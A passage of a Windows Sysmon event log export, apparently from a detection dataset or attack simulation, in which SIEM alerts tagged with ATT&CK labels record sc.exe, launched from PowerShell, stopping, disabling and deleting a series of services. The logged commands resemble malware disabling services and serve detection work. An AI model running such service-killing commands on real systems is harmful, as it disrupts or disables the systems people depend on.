-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.905"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00105ff21d00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.197",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.869 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001095f01d00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 
6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.871889100Z"",""eventRecordID"":""2357"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.869\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001095f01d00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:00.869"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001095f01d00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.154",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.806 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010faed1d00} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.808880600Z"",""eventRecordID"":""2354"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.806\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010faed1d00}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.806"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010faed1d00}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.089",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.773 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001067ec1d00} +ProcessId: 1844 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.775071900Z"",""eventRecordID"":""2352"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.773\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001067ec1d00}\r\nProcessId: 1844\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.773"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001067ec1d00}"",""processId"":""1844"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.058",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.753 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001092eb1d00} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.756300200Z"",""eventRecordID"":""2351"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.753\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001092eb1d00}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.753"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001092eb1d00}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.010",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:50:00.669 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001029e81d00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.671339500Z"",""eventRecordID"":""2348"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.669\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001029e81d00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.669"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001029e81d00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.948",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.578 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010cbe51d00} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.584843400Z"",""eventRecordID"":""2345"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.578\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010cbe51d00}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.578"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010cbe51d00}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
